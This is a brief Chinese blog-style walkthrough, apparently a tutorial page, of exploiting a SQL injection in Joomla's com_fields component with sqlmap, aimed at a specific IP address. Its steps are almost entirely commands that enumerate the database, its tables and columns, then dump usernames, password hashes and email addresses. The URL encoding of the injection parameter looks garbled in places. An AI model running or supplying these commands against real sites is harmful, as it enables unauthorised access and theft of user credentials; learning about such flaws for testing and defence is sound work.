1.寻找注入点:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list5B%fullordering5D%="
2.用kali使用sqlmap爆破,找数据库名:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list5B%fullordering5D%="--dbs
3.在joomal库中找到表名:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list5B%fullordering5D%="-D joomal --tables
4.找表中的字段名:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list5B%fullordering5D%="-D joomal -T'#--users'--columns
5.找用户名,密码和邮箱:
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list5B%fullordering5D%="-D joomal -T'#--users'-C username,password,email--dump
6.等待破解成功:
SQL注入
最新推荐文章于 2024-08-13 14:34:13 发布